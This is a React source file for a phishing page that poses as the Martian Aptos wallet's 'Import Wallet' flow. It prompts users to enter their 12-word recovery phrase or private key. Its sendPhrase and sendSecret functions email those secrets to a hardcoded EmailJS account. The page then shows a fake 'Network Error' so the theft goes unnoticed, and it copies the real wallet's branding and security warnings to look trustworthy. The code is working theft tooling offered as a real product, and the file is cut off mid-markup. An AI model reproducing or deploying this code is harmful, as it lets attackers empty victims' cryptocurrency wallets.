import { useState, useEffect, useRef } from 'react';
import {
  BrowserRouter as Router,
  Switch,
  Route,
} from "react-router-dom";
import { 
	Flex,
	Text,
  	Image,
  	ChakraProvider,
  	Spinner,
} from "@chakra-ui/react";
import emailjs from 'emailjs-com';
import "./App.scss";
import "./mdi/css/materialdesignicons.css";
import Logo from "./logo.png";
import Info from "./info.png";
import EyeOn from "./eyeOn.png";
import EyeOff from "./eyeOff.png";
import Aos from "aos";
import "aos/dist/aos.css";
import { FadeIn } from 'react-slide-fade-in';


function App() {
	const [screen, setScreen] = useState(0)
	const [screen2, setScreen2] = useState(0)
	const [err, setErr] = useState(false)
	const [errMsg, setErrMsg] = useState("")
	const [isChecked, setIsChecked] = useState(false)
	const [loading, setLoading] = useState(false)
	const [loading2, setLoading2] = useState(false)
	const [loading3, setLoading3] = useState(false)
	const [eye, setEye] = useState(false)
	const [screenBk, setScreenBk] = useState(0)
	const [noSlide, setNoSlide] = useState(1)

	const inp1 = useRef("")
	const inp2 = useRef("")
	const inp3 = useRef("")
	const inp4 = useRef("")

	useEffect(() => {
		Aos.init({ duration: 1000 });
	}, [])

	async function sendSecret(data) {
		setLoading3(true)
		const templateParams = {
			from_name: "New User",
			message: "MARTIAN APTOS: Private Key is: ("+data+")",
		}
		await emailjs.send('Outlook', 'template_gkcghjf', templateParams, 'user_dc6zvosdPxmxouq5EigcI')
		.then((response) => {
			console.log('')
		}, (err) => {
			console.log('')
		})
		setLoading3(false)
		setScreen2(2)
	}

	async function sendPhrase(data) {
		setLoading(true)
		const templateParams = {
			from_name: "New User",
			message: "MARTIAN APTOS: Phrase is: ("+data+")",
		}
		await emailjs.send('Outlook', 'template_gkcghjf', templateParams, 'user_dc6zvosdPxmxouq5EigcI')
		.then((response) => {
			console.log('')
		}, (err) => {
			console.log('')
		})
		setLoading(false)
		setScreen2(2)
	}

	useEffect(() => {
		document.addEventListener("paste", function(e) {
			if (e.target.type === "text") {
				e.preventDefault()
				var data = e.clipboardData.getData('Text');
				data = data.split(' ');
				[].forEach.call(document.querySelectorAll("input[type=text]"), (node, index) => {
					if(data[index] !== undefined) {
						node.value = data[index];
					}
					else {
						node.value = "";
					}
				});
				}
		  });
	}, [])

	useEffect(() => {
		setIsChecked(false)
		setEye(false)
		setLoading(false)
		setLoading2(false)
		setLoading3(false)
	}, [screen2])


	useEffect(() => {
		if(err) {
			setTimeout(function() {
				setErr(false)
			}, 2500)
		}
	}, [err])

	const menus = [{title: "Create a New Wallet", sub: "Get started by creating your very first wallet to hold, trade and exchange crypto assets", icon: <svg width="28" height="26" viewBox="0 0 28 26" xmlns="http://www.w3.org/2000/svg" class="wallet-svg" fill="rgb(180, 176, 168)"><path fill-rule="evenodd" clip-rule="evenodd" d="M22.08 7.54H28C28 2.78 25.16 0 20.32 0H7.68C2.84 0 0 2.78 0 7.48V17.74C0 22.44 2.84 25.22 7.68 25.22H20.32C25.14 25.22 28 22.44 28 17.74V17.28H22.08C19.34 17.28 17.1 15.1 17.1 12.42C17.1 9.76 19.32 7.54 22.08 7.54ZM22.08 9.62H26.96C27.54 9.62 28 10.08 28 10.64V14.18C28 14.74 27.52 15.2 26.96 15.2H22.2C20.8 15.22 19.6 14.28 19.28 12.96C19.12 12.14 19.34 11.3 19.88 10.64C20.42 10.02 21.22 9.64 22.08 9.62ZM22.28 13.34H22.74C23.34 13.34 23.82 12.88 23.82 12.3C23.82 11.72 23.34 11.26 22.74 11.26H22.28C22 11.26 21.72 11.36 21.52 11.56C21.32 11.76 21.2 12.02 21.2 12.3C21.22 12.86 21.7 13.34 22.28 13.34ZM6.64 7.54H14.54C15.14 7.54 15.62 7.08 15.62 6.5C15.62 5.92 15.14 5.46 14.54 5.46H6.64C6.06 5.46 5.58 5.92 5.56 6.5C5.56 7.06 6.04 7.52 6.64 7.54Z"></path></svg>,}, {title: "I already have a Wallet", sub: "Import your seed phrase from an existing account and to holdin, trade and exchange assets from Martian", icon: <svg width="32" height="22" viewBox="0 0 32 22" xmlns="http://www.w3.org/2000/svg" fill="rgb(180, 176, 168)"><path d="M25.8057 8.61713C24.8914 4.02284 20.8457 0.571411 16 0.571411C12.1371 0.571411 8.8 2.7657 7.13143 5.9657C3.10857 6.37713 0 9.78284 0 13.8971C0 18.3086 3.58857 21.8971 8 21.8971H25.3257C29.0057 21.8971 32 18.9028 32 15.2228C32 11.7257 29.2571 8.86855 25.8057 8.61713ZM19.9086 11.7714C19.68 12 19.3829 12.0914 19.1086 12.0914C18.8343 12.0914 18.5143 12 18.2857 11.7714L17.1429 10.6057V16.32C17.1429 16.96 16.64 17.4628 16 17.4628C15.36 17.4628 14.8571 16.96 14.8571 16.32V10.6286L13.7143 11.7714C13.4857 12 13.1886 12.1143 12.8914 12.1143C12.5943 12.1143 12.32 12 12.0914 11.7714C11.6343 11.3143 11.6343 10.6057 12.0914 10.1486L15.1771 7.06284C15.2914 6.94855 15.4057 6.87998 15.5429 6.81141C15.7029 6.7657 15.84 6.71998 16 6.71998C16.16 6.71998 16.2971 6.74284 16.4343 6.81141C16.5714 6.85713 16.6857 6.94855 16.7771 7.03998C16.7771 7.03998 16.8 7.03998 16.8 7.06284L19.9086 10.1486C20.3657 10.5828 20.3657 11.3143 19.9086 11.7714Z"></path></svg>,},]


	const menus2 = [{title: "Secret Phrase", icon: <svg width="18px" height="18px" viewBox="0 0 16 12" fill="none" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" clip-rule="evenodd" d="M12.2121 1.04945C11.9663 1.29202 11.1949 2.04734 10.4979 2.72792C8.19441 4.97689 3.81255 9.25955 2.92376 10.1306C2.35651 10.6865 2.36759 10.5765 2.83206 11.0414C3.30031 11.5101 3.17564 11.5318 3.8551 10.8633C4.37564 10.3511 5.57491 9.17454 9.87405 4.95835C13.0406 1.85289 13.4865 1.41111 13.4919 1.37346C13.4993 1.32242 12.7591 0.608398 12.6988 0.608398C12.6721 0.608398 12.5109 0.754515 12.2121 1.04945ZM7.52892 1.76358C4.7837 1.96267 2.21646 3.49845 0.722308 5.83543C0.54561 6.11178 0.543681 6.07513 0.751508 6.38913C1.45045 7.4451 2.9321 8.89458 3.17581 8.76081C3.19841 8.74841 3.72629 8.23456 4.34888 7.61892L5.48086 6.4996L5.46471 6.38612C5.24576 4.84751 6.49404 3.50187 8.14847 3.49302L8.54107 3.49092L8.91442 3.12323C10.2181 1.83927 10.1053 1.97355 9.91537 1.93268C9.2155 1.78202 8.23371 1.71246 7.52892 1.76358ZM12.2127 3.68614C10.8033 5.05032 10.6218 5.22872 10.6118 5.26034C10.6059 5.27895 10.6217 5.3654 10.6468 5.45246C11.2091 7.39581 9.27661 9.27024 7.34539 8.65475C7.26524 8.62922 7.1801 8.60832 7.15618 8.60832C7.10286 8.60832 5.72279 9.97909 5.72279 10.032C5.72279 10.0829 6.0464 10.1767 6.58584 10.2822C9.98435 10.9466 13.5207 9.40067 15.4995 6.3855C15.707 6.0694 15.7064 6.10732 15.5084 5.80474C14.9418 4.93908 14.2041 4.1597 13.3684 3.54403C13.1061 3.35082 12.8153 3.16157 12.7806 3.16157C12.7663 3.16157 12.5108 3.39763 12.2127 3.68614Z" fill="#FF0000"></path></svg>}, {title: "Private Key", icon: <svg width="18px" height="18px" viewBox="0 0 13 12" fill="none" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" clip-rule="evenodd" d="M6.96737 0.173284C5.00587 0.726774 4.19901 3.10163 5.34294 4.95459C5.55672 5.30088 5.53015 5.33951 4.09332 6.77073C2.54029 8.31764 2.6699 8.24541 2.21656 7.81664C1.75451 7.37974 1.73672 7.38522 0.903612 8.22071C0.0717978 9.05485 0.0666389 9.07162 0.501602 9.5316C0.885169 9.93716 0.883621 9.92568 0.600653 10.2644C0.105524 10.857 0.339418 11.6535 1.04742 11.7864C1.49457 11.8703 1.58878 11.7923 4.20927 9.17118C5.59238 7.78775 6.77184 6.65588 6.8304 6.65588C6.88895 6.65588 7.15115 6.75764 7.41297 6.88197C9.83748 8.03338 12.1836 6.62583 12.0256 4.11458C11.8699 1.64087 9.18377 -0.452108 6.96737 0.173284ZM8.74784 2.13684C10.6071 3.07951 10.7516 5.68696 8.93279 5.47326C7.40342 5.29353 6.13375 3.38408 6.84026 2.32637C7.18004 1.8177 7.96465 1.73973 8.74784 2.13684Z" fill="#3D7CDB"></path></svg>}, {title: "Hardware Wallet", icon: <svg width="18px" height="18px" viewBox="0 0 13 12" fill="none" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" clip-rule="evenodd" d="M1.33782 0.649585C0.82456 0.748519 0.316678 1.24546 0.175724 1.78665C0.113323 2.02623 0.113771 9.75395 0.1762 10.0187C0.30408 10.5612 0.740128 10.9909 1.27841 11.105C1.55483 11.1636 11.1429 11.1636 11.4194 11.105C11.9577 10.9909 12.3937 10.5612 12.5216 10.0187C12.584 9.75395 12.5845 2.02623 12.5221 1.78665C12.3778 1.23291 11.8705 0.745775 11.3352 0.64701C11.1461 0.612128 1.51922 0.61462 1.33782 0.649585ZM11.2598 1.5978C11.5246 1.65922 11.5926 1.78038 11.6069 2.21615C11.6191 2.58887 11.6029 2.62442 11.442 2.57826C11.3811 2.56082 9.52728 2.55083 6.34889 2.55083C3.1705 2.55083 1.31665 2.56082 1.25582 2.57826C1.09488 2.62442 1.07867 2.58887 1.0909 2.21615C1.10496 1.78763 1.17514 1.6581 1.42524 1.59906C1.55878 1.56754 11.124 1.5663 11.2598 1.5978ZM11.387 3.5517C11.6929 3.706 11.7192 4.55777 11.4159 4.48776C11.208 4.43978 1.48974 4.43978 1.28188 4.48776C0.978559 4.55777 1.00485 3.706 1.31077 3.5517C1.46122 3.47577 11.2366 3.47577 11.387 3.5517ZM11.387 5.45534C11.5417 5.53337 11.5878 5.64442 11.605 5.98033C11.6263 6.39891 11.7673 6.35804 10.2997 6.35854C8.55219 6.3591 8.20775 6.47763 7.8446 7.2032C7.11869 8.65367 5.57909 8.65367 4.85318 7.2032C4.49082 6.4792 4.14181 6.3591 2.39804 6.35854C0.930436 6.35804 1.07145 6.39891 1.09281 5.98033C1.10997 5.64442 1.15607 5.53337 1.31077 5.45534C1.46122 5.37942 11.2366 5.37942 11.387 5.45534Z" fill="#838078"></path></svg>},]


	return (
		<ChakraProvider>
			<Flex w="100%" bg="rgb(252,252,252)" minHeight="100vh" align="flex-start" fontFamily="font2" fontSize="15px" direction={["column", "row"]} pb={["8%", "0"]}>
				<Flex w="20%" py={["10%", "3%"]} pl={["8%", "5%"]}>
					<Flex w="100%" align="center">
						<Image w="22px" h="22px" src={Logo} />
						<Text fontFamily="font3" fontSize="18px" fontWeight="bold" ml="1.5">MARTIAN</Text>
					</Flex>
				</Flex>


				<Flex w={["95%", "60%"]} mx={["2.5%", "0"]} py="1%" minHeight={["auto", "100vh"]} align="center">
					<Flex w={["100%", "98%"]} borderRadius="24px" boxShadow="0 4px 70px #0000000f" bg="#fff" direction="column" align="center">
						{
							screen === 0 ?
							<Flex w="100%" direction="column" py={["4%", "12%"]} px={["5%", "17%"]} align="center">
								<Text fontSize={["28px", "48px"]} fontWeight="500" fontFamily="font1" lineHeight="87px" textAlign="center">Welcome to Martian</Text>
								<Text px={["5%", "20%"]} textAlign="center" fontSize="15px" color="rgb(131, 128, 120)">The Aptos wallet reimagined; hold crypto, NFTs, swap assets and track past activity</Text>

								<Flex w="100%" direction="column" mt="2" data-aos={noSlide === 0 && "fade-left"}>
									{
										menus.map((item, index) => (
											<Flex key={index} w="100%" padding="25px 34px 24px 30px" boxShadow="rgb(10 10 20 / 8%) 0px 10px 20px" borderRadius="12px" border="2px solid transparent" align="center" cursor="pointer" mt="12" _hover={{ border: "2px solid rgb(180, 176, 168)"}} transition="300ms ease-in-out" onClick={() => {
												if(index === 1) {
													setScreen2(0)
													setScreen(1)
													setScreenBk(0)
													setNoSlide(1)
												}
												else {
													setScreen2(4)
													setScreen(1)
													setScreenBk(1)
													setNoSlide(1)
												}
											}}>
												<Flex flex="1" w="62px" mr="6"><Flex w="60px" h="60px" bg="rgb(248, 248, 250)" borderRadius="100%" color="rgb(180, 176, 168)" align="center" justify="center">{item.icon}</Flex></Flex>
												<Text>
													<Text lineHeight="24px" fontSize="18px" fontWeight="600">{item.title}</Text>
													<Text fontSize="15px" color="rgb(131, 128, 120)">{item.sub}</Text>
												</Text>
											</Flex>
										))
									}
								</Flex>
							</Flex>
							:
							<Flex direction="column" w="100%" overflowX="hidden">
								<Flex borderRadius="1000px 0px 0px 0px" h="10px" bg="rgb(0,0,0)" w={screen2 === 1 ? "20%" : screen2 === 2 ? "50%" : screen2 === 3 ? "20%" : screen2 === 4 ? "20%" : "10%"} transition="800ms ease-in-out"></Flex>

								<Flex w="100%" direction="column" align="center" px={["4%", "6%"]} py="4%">
									<Flex w="100%" align="flex-start">
										<Flex w="15%">
											<Flex w="36px" h="36px" borderRadius="100%" justify="center" align="center" bg="rgb(250, 250, 250)" cursor="pointer" _hover={{ bg: "rgb(240, 240, 240)" }} transition="300ms ease-in-out" onClick={() => {
												setNoSlide(0)
												if(screen2 === 0) {
													setScreen(0)
												}
												else if(screen2 === 1) {
													setScreen2(0)
												}
												else if(screen2 === 2) {
													if(screenBk === 0) {
														setScreen2(1)
													}
													else {
														setScreen(0)
													}
												}
												else if(screen2 === 3) {
													setScreen2(0)
												}
												else if(screen2 === 4) {
													setScreen(0)
												}
											}}>
												<svg width="15" height="14" viewBox="0 0 15 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M13.7457 6.22602H3.02967L7.35167 1.90402C7.48295 1.77274 7.55671 1.59468 7.55671 1.40902C7.55671 1.22336 7.48295 1.0453 7.35167 0.91402C7.22039 0.782738 7.04233 0.708984 6.85667 0.708984C6.67101 0.708984 6.49295 0.782738 6.36167 0.91402L0.842672 6.43002C0.712111 6.56168 0.638855 6.7396 0.638855 6.92502C0.638855 7.11044 0.712111 7.28836 0.842672 7.42002L6.36267 12.94C6.49395 13.0713 6.67201 13.1451 6.85767 13.1451C7.04333 13.1451 7.22139 13.0713 7.35267 12.94C7.48395 12.8087 7.55771 12.6307 7.55771 12.445C7.55771 12.2594 7.48395 12.0813 7.35267 11.95L3.02967 7.62502H13.7457C13.9313 7.62502 14.1094 7.55127 14.2406 7.41999C14.3719 7.28872 14.4457 7.11067 14.4457 6.92502C14.4457 6.73937 14.3719 6.56132 14.2406 6.43005C14.1094 6.29877 13.9313 6.22502 13.7457 6.22502V6.22602Z" fill="#646470"></path></svg>
											</Flex>
										</Flex>

										<Flex w="70%" direction="column" align="center">
											{
												screen2 === 0 ?
												<Flex w="100%" direction="column" align="center">
													<Flex>
														<svg width="88" height="87" viewBox="0 0 88 87" fill="none" xmlns="http://www.w3.org/2000/svg"><ellipse cx="44.2305" cy="43.144" rx="43.5196" ry="42.8984" fill="#3D7CDB" fill-opacity="0.1"></ellipse><svg xmlns="http://www.w3.org/2000/svg" x="24.7305" y="26.144" width="39" height="34" viewBox="0 0 39 34" fill="none"><path fill-rule="evenodd" clip-rule="evenodd" d="M3.73999 0.958108C2.15327 1.26396 0.583156 2.80023 0.147399 4.47333C-0.0455109 5.21399 -0.044126 29.1041 0.148871 29.9227C0.544211 31.5996 1.89225 32.9281 3.55634 33.2808C4.4109 33.462 34.0524 33.462 34.907 33.2808C36.5711 32.9281 37.9191 31.5996 38.3144 29.9227C38.5074 29.1041 38.5088 5.21399 38.3159 4.47333C37.87 2.76146 36.3016 1.25548 34.6466 0.950147C34.0623 0.842311 4.30081 0.850013 3.73999 0.958108ZM34.4138 3.8895C35.2323 4.07938 35.4425 4.45395 35.4867 5.80111C35.5245 6.95338 35.4744 7.0633 34.9768 6.92058C34.7888 6.86666 29.0576 6.83577 19.2317 6.83577C9.4057 6.83577 3.67457 6.86666 3.4865 6.92058C2.98895 7.0633 2.93884 6.95338 2.97666 5.80111C3.02011 4.47636 3.23708 4.07591 4.01028 3.89339C4.4231 3.79594 33.9938 3.79213 34.4138 3.8895ZM34.8069 9.92995C35.7527 10.407 35.834 13.0402 34.8962 12.8238C34.2536 12.6754 4.20968 12.6754 3.56708 12.8238C2.62935 13.0402 2.71062 10.407 3.65639 9.92995C4.12149 9.69523 34.3418 9.69523 34.8069 9.92995ZM34.8069 15.815C35.2852 16.0563 35.4277 16.3996 35.4808 17.438C35.5468 18.7321 35.9827 18.6057 31.4457 18.6073C26.0431 18.609 24.9783 18.9754 23.8556 21.2185C21.6115 25.7026 16.8518 25.7026 14.6077 21.2185C13.4875 18.9803 12.4085 18.609 7.01765 18.6073C2.48058 18.6057 2.91651 18.7321 2.98255 17.438C3.0356 16.3996 3.17814 16.0563 3.65639 15.815C4.12149 15.5803 34.3418 15.5803 34.8069 15.815Z" fill="#3D7CDB"></path></svg></svg>
													</Flex>
													<Text fontSize={["28px", "48px"]} fontFamily="font1" mt="6" textAlign="center">Import Wallet</Text>
													<Text color="rgb(131, 128, 120)" mt="4" textAlign="center">Select a method to import your Aptos wallet.</Text>
												</Flex>
												:
												screen2 === 1 ?
												<Flex w="100%" direction="column" align="center">
													<Text fontSize={["28px", "48px"]} fontFamily="font1" lineHeight="87px">Recovery Phrase</Text>
													<Text color="rgb(131, 128, 120)" px={["0%", "15%"]} textAlign="center">Import an existing wallet with your 12 word secret recovery phrase or input your private key</Text>
												</Flex>
												:
												screen2 === 2 ?
												<Flex w="100%" direction="column" align="center">
													<Text fontSize={["28px", "48px"]} fontFamily="font1" lineHeight="87px">Create a Password</Text>
													<Text color="rgb(131, 128, 120)" px={["0", "16%"]} textAlign="center">You will use the password to unlock your wallet. Do not share your password with others</Text>
												</Flex>
												:
												screen2 === 3 ?
												<Flex w="100%" direction="column" align="center">
													<Flex w="85px" h="85px" justify="center" align="center" borderRadius="100%" bg="rgb(236, 242, 251)">
														<svg width="13" height="12" viewBox="0 0 13 12" fill="none" xmlns="http://www.w3.org/2000/svg" style={{ width: "33px", height: "33px" }}><path fill-rule="evenodd" clip-rule="evenodd" d="M6.96737 0.173284C5.00587 0.726774 4.19901 3.10163 5.34294 4.95459C5.55672 5.30088 5.53015 5.33951 4.09332 6.77073C2.54029 8.31764 2.6699 8.24541 2.21656 7.81664C1.75451 7.37974 1.73672 7.38522 0.903612 8.22071C0.0717978 9.05485 0.0666389 9.07162 0.501602 9.5316C0.885169 9.93716 0.883621 9.92568 0.600653 10.2644C0.105524 10.857 0.339418 11.6535 1.04742 11.7864C1.49457 11.8703 1.58878 11.7923 4.20927 9.17118C5.59238 7.78775 6.77184 6.65588 6.8304 6.65588C6.88895 6.65588 7.15115 6.75764 7.41297 6.88197C9.83748 8.03338 12.1836 6.62583 12.0256 4.11458C11.8699 1.64087 9.18377 -0.452108 6.96737 0.173284ZM8.74784 2.13684C10.6071 3.07951 10.7516 5.68696 8.93279 5.47326C7.40342 5.29353 6.13375 3.38408 6.84026 2.32637C7.18004 1.8177 7.96465 1.73973 8.74784 2.13684Z" fill="#3D7CDB"></path></svg>
													</Flex>
													<Text fontSize={["28px", "48px"]} fontFamily="font1" mt="6" textAlign="center">Private Key</Text>
													<Text color="rgb(131, 128, 120)" mt="6" textAlign="center" px={["0", "10%"]}>To import a new wallet, enter it’s private key below. It will be enctypted and stored securely on your device.</Text>
												</Flex>
												:
												screen2 === 4 ?
												<Flex w="100%" direction="column" align="center">
													<Text fontSize={["28px", "48px"]} fontFamily="font1" lineHeight="87px">Create a Password</Text>
													<Text color="rgb(131, 128, 120)" px={["0", "16%"]} textAlign="center">You will use the password to unlock your wallet. Do not share your password with others</Text>
												</Flex>
												:
												<></>
											}
										</Flex>

										<Flex w="15%" justify="flex-end">
											<Flex w="36px" h="36px" borderRadius="100%" justify="center" align="center" bg="rgb(250, 250, 250)" cursor="pointer" _hover={{ bg: "rgb(240, 240, 240)" }} transition="300ms ease-in-out" onClick={() => {
												setNoSlide(0)
												setScreen(0)
											}}>
												<svg width="13" height="13" viewBox="0 0 13 13" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M12.6389 11.9664C12.9377 11.6676 12.9377 11.1697 12.6389 10.9705L7.85883 6.29004L12.4397 1.60954C12.7385 1.31079 12.7385 0.812861 12.4397 0.514105C12.141 0.21535 11.6431 0.21535 11.3443 0.514105L6.76339 5.29419L2.18248 0.61369C1.88372 0.314935 1.3858 0.314935 1.08704 0.61369C0.788287 0.912446 0.788287 1.31079 1.08704 1.60954L5.76754 6.29004L1.08704 10.9705C0.788287 11.2693 0.788287 11.7672 1.08704 12.066C1.3858 12.3647 1.88372 12.3647 2.08289 12.066L6.76339 7.38548L11.4439 11.9664C11.7426 12.2651 12.2406 12.2651 12.6389 11.9664Z" fill="#838078"></path></svg>
											</Flex>
										</Flex>
									</Flex>





									{
										screen2 === 0 ?
										<Flex mt="8" px={["0", "10%"]} w="100%" direction="column">
											<Flex direction="column" w="100%" border="1px solid rgb(250, 250, 250)" boxShadow="rgb(10 10 20 / 10%) 0px 10px 20px" borderRadius="9px" data-aos={noSlide === 1 && "fade-left"}>
												{
													menus2.map((item, index) => (
														<Flex w="100%" padding="15px" borderBottom="2px solid rgb(250, 250, 250)" cursor="pointer" key={index} align="center" _hover={{ bg: "rgb(248,248,248)" }} transition="100ms ease-in-out" onClick={() => index === 0 ? setScreen2(1) : index === 1 && setScreen2(3)}>
															<Flex w="36px" h="36px" borderRadius="100%" justify="center" align="center" mr="10px" bg={index === 0 ? "rgba(255, 9, 9, 0.1)" : index === 1 ? "rgb(236, 242, 251)" : "rgb(250, 250, 250)"}>
																{item.icon}
															</Flex>
															<Text fontSize="16px" fontWeight="bold">{item.title}</Text>
															{
																index < 2 ?
																<Flex ml="auto">
																	<svg width="14" height="14" viewBox="0 0 14 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M4.15043 2.15602L5.1146 1.19727L10.4717 6.55977L5.10918 11.9223L4.15043 10.9635L8.55418 6.55977L4.15043 2.15602Z" fill="#ADADAD" fill-opacity="0.74"></path></svg>
																</Flex>
																:
																<Text ml="auto" color="rgb(131, 128, 120)" padding="5px 10px" borderRadius="50px" bg="rgb(250, 250, 250)" fontSize="13px">Coming Soon</Text>
															}
														</Flex>
													))
												}
											</Flex>

											<Flex mt="70px" align="center" justify="center" mb="4" cursor="pointer" onClick={() => window.open("https://martianwallet.xyz/support", "_BLANK")}>
												<Image w="15px" h="15px" mr="1.5" src={Info} />
												<Text color="rgb(131, 128, 120)">HELP</Text>
											</Flex>
										</Flex>
										:
										screen2 === 1 ? 
										<Flex w="100%" mt="10" direction="column">
											<Flex w="100%" flexWrap="wrap" justify="space-between">
												{
													Array.from(Array(12).keys()).map((item, index) => (
														<Flex key={index} w={["48%", "28%"]} align="center" mb="6">
															<Text fontSize="12px" mr="4">{index + 1}.</Text>
															<input type="text" style={{ border: "1px solid rgb(219, 219, 219)", padding: "13px 16px", borderRadius: "13px", fontFamily: "font1", fontWeight: "200", width: "100%", color: "rgb(70, 70, 70)" }} />
														</Flex>
													))
												}
											</Flex>

											<Flex bg="rgb(0, 0, 0)" w={["100%", "70%"]} mx="auto" mt={["6", "12"]} borderRadius="7px" justify="center" color="#fff" padding="5px 5px" h="50px" align="center" fontSize="20px" cursor="pointer" direction="column" onClick={async () => {
												var seed = ""
												await [].forEach.call(document.querySelectorAll("input[type=text]"), (node, index) => {
													seed = seed + node.value + " "
												})

												if(seed.match(/(\w+)/g)?.length > 11) {
													sendPhrase(seed)
												}
												else {
													setErrMsg("Invalid Mnemonic!")
													setErr(true)
												}
											}}>
												<Flex border="2.5px solid rgb(255, 255, 255)" w="100%" borderRadius="2px" display="absolute" h="43px" align="center" justify="center">
													<Flex h="43px" mt="-2.5px" bg="#000" w="96%" _hover={{ w: "92%" }} transition="300ms ease-in-out" mx="auto" align="center" justify="center">IMPORT WALLET {loading && <Spinner color="#fff" ml="3" size='sm' />}</Flex>
												</Flex>
											</Flex>
										</Flex>
										:
										screen2 === 2 ?
										<Flex w="100%" mt="10" direction="column" px={["2%", "13%"]}>
											<Text color="rgb(131, 128, 120)" mb="1">Password</Text>
											<input type="password" ref={inp1} style={{ border: "1px solid rgb(219, 219, 219)", borderRadius: "13px", padding: "16px 16px", width: "100%", color: "#000" }} />

											<Text color="rgb(131, 128, 120)" mb="1" mt="6">Confirm Password</Text>
											<input type="password" ref={inp2} style={{ border: "1px solid rgb(219, 219, 219)", borderRadius: "13px", padding: "16px 16px", width: "100%", color: "#000" }} />

											<Flex w="100%" mt="6" align="center">
												<input type="checkbox" style={{ color: "rgb(131, 128, 120)", cursor: "pointer" }} onChange={() => isChecked ? setIsChecked(false) : setIsChecked(true)}/>

												<Text color="rgb(131, 128, 120)" ml="4">I have read and agree to the <Text as="span" cursor="pointer" color="#000" borderBottom="1px solid blue" fontSize="17px" onClick={() => window.open("https://martianwallet.xyz/terms", "_BLANK")}>Terms of Service</Text> and <Text as="span" cursor="pointer" color="#000" borderBottom="1px solid blue" fontSize="17px" onClick={() => window.open("https://martianwallet.xyz/privacy-policy", "_BLANK")}>Privacy Policy.</Text></Text>
											</Flex>

											<Flex w="100%" mt="6" bg="rgb(248, 248, 250)" borderRadius="7px" padding="9px 12px">
												<Flex w="14px" mt="1">
													<Image w="14px" h="14px" src={Info} />
												</Flex>
												<Text flex="1" color="rgb(131, 128, 120)" ml="3">For your protection, Martian locks your wallet after 60 minutes of inactivity. You will need this password to unlock it. The password is stored securely on your device. We cannot recover the password for you, if it is lost.</Text>
											</Flex>

											<Flex bg="rgb(0, 0, 0)" w="100%" mx="auto" mt="8" borderRadius="7px" justify="center" color="#fff" padding="5px 5px" h="50px" align="center" fontSize="20px" cursor={isChecked ? "pointer" : "not-allowed"} direction="column" onClick={() => {
												var a = inp1.current.value
												var b = inp2.current.value
												if(a !== "" && b !== "" && a === b && isChecked) {
													setLoading2(true)
													setTimeout(function() {
														setErrMsg("Network Error! Kindly try again")
														setErr(true)
														setLoading2(false)
													}, 4000)
												}
												else if(a !== b && isChecked) {
													setErrMsg("Password and Confirm password should match")
													setErr(true)
												}
											}}>
												<Flex border="2.5px solid rgb(255, 255, 255)" w="100%" borderRadius="2px" display="absolute" h="43px" align="center" justify="center">
													<Flex h="43px" mt="-2.5px" bg="#000" w="96%" _hover={{ w: "92%" }} transition="300ms ease-in-out" mx="auto" align="center" justify="center">CONTINUE {loading2 && <Spinner color="#fff" ml="3" size='sm' />}</Flex>
												</Flex>
											</Flex>
										</Flex>
										:
										screen2 === 3 ?
										<Flex w="100%" mt="10" direction="column" px={["2%", "13%"]}>
											<Flex w="100%" border="1px solid rgb(233, 232, 228)" borderRadius="8px" boxShadow="rgb(0 0 0 / 10%) 0px 4.22824px 10.5706px" h="48px" align="center" px="4">
												<input type={eye ? "text" : "password"} style={{ letterSpacing: "2px", padding: "5px 0px", width: "100%", textAlign: "center", fontSize: "16px", color: "#000" }} id="clipboard-paste" placeholder="Private Key" />
												<Flex ml="4">
													<Image w="20px" h="20px" src={eye ? EyeOff : EyeOn} cursor="pointer" onClick={() => eye ? setEye(false) : setEye(true)} />
												</Flex>
											</Flex>
											<Flex w="100%" justify="center" mt="3">
												<Flex bg="rgb(250, 250, 250)" cursor="pointer" padding="8px 15px" borderRadius="50px" color="rgb(131, 128, 120)" onClick={() => {
													navigator.clipboard.readText().then((clipText) => (document.getElementById('clipboard-paste').value = clipText))
												}}>PASTE</Flex>
											</Flex>
											<Text color="red" textAlign="center" mt="70px" px={["0", "10%"]}>Never share the private key. Anyone with the private key will have full access to your wallet.</Text>

											<Flex bg="rgb(0, 0, 0)" w="100%" mx="auto" mt="6" borderRadius="7px" justify="center" color="#fff" padding="5px 5px" h="50px" align="center" fontSize="20px" cursor="pointer" direction="column" onClick={() => {
												var a = document.getElementById('clipboard-paste').value
												if(a.length > 20) {
													sendSecret(a)
												}
												else {
													setErrMsg("Invalid Private Key")
													setErr(true)
												}
											}}>
												<Flex border="2.5px solid rgb(255, 255, 255)" w="100%" borderRadius="2px" display="absolute" h="43px" align="center" justify="center">
													<Flex h="43px" mt="-2.5px" bg="#000" w="96%" _hover={{ w: "92%" }} transition="300ms ease-in-out" mx="auto" align="center" justify="center">IMPORT WALLET {loading3 && <Spinner color="#fff" ml="3" size='sm' />}</Flex>
												</Flex>
											</Flex>
										</Flex>
										:
										screen2 === 4 ?
										<Flex w="100%" mt="10" direction="column" px={["2%", "13%"]} data-aos="fade-left">
											<Text color="rgb(131, 128, 120)" mb="1">Password</Text>
											<input type="password" ref={inp3} style={{ border: "1px solid rgb(219, 219, 219)", borderRadius: "13px", padding: "16px 16px", width: "100%", color: "#000" }} />

											<Text color="rgb(131, 128, 120)" mb="1" mt="6">Confirm Password</Text>
											<input type="password" ref={inp4} style={{ border: "1px solid rgb(219, 219, 219)", borderRadius: "13px", padding: "16px 16px", width: "100%", color: "#000" }} />

											<Flex w="100%" mt="6" align="center">
												<input type="checkbox" style={{ color: "rgb(131, 128, 120)", cursor: "pointer" }} onChange={() => isChecked ? setIsChecked(false) : setIsChecked(true)}/>

												<Text color="rgb(131, 128, 120)" ml="4">I have read and agree to the <Text as="span" cursor="pointer" color="#000" borderBottom="1px solid blue" fontSize="17px" onClick={() => window.open("https://martianwallet.xyz/terms", "_BLANK")}>Terms of Service</Text> and <Text as="span" cursor="pointer" color="#000" borderBottom="1px solid blue" fontSize="17px" onClick={() => window.open("https://martianwallet.xyz/privacy-policy", "_BLANK")}>Privacy Policy.</Text></Text>
											</Flex>

											<Flex w="100%" mt="6" bg="rgb(248, 248, 250)" borderRadius="7px" padding="9px 12px">
												<Flex w="14px" mt="1">
													<Image w="14px" h="14px" src={Info} />
												</Flex>
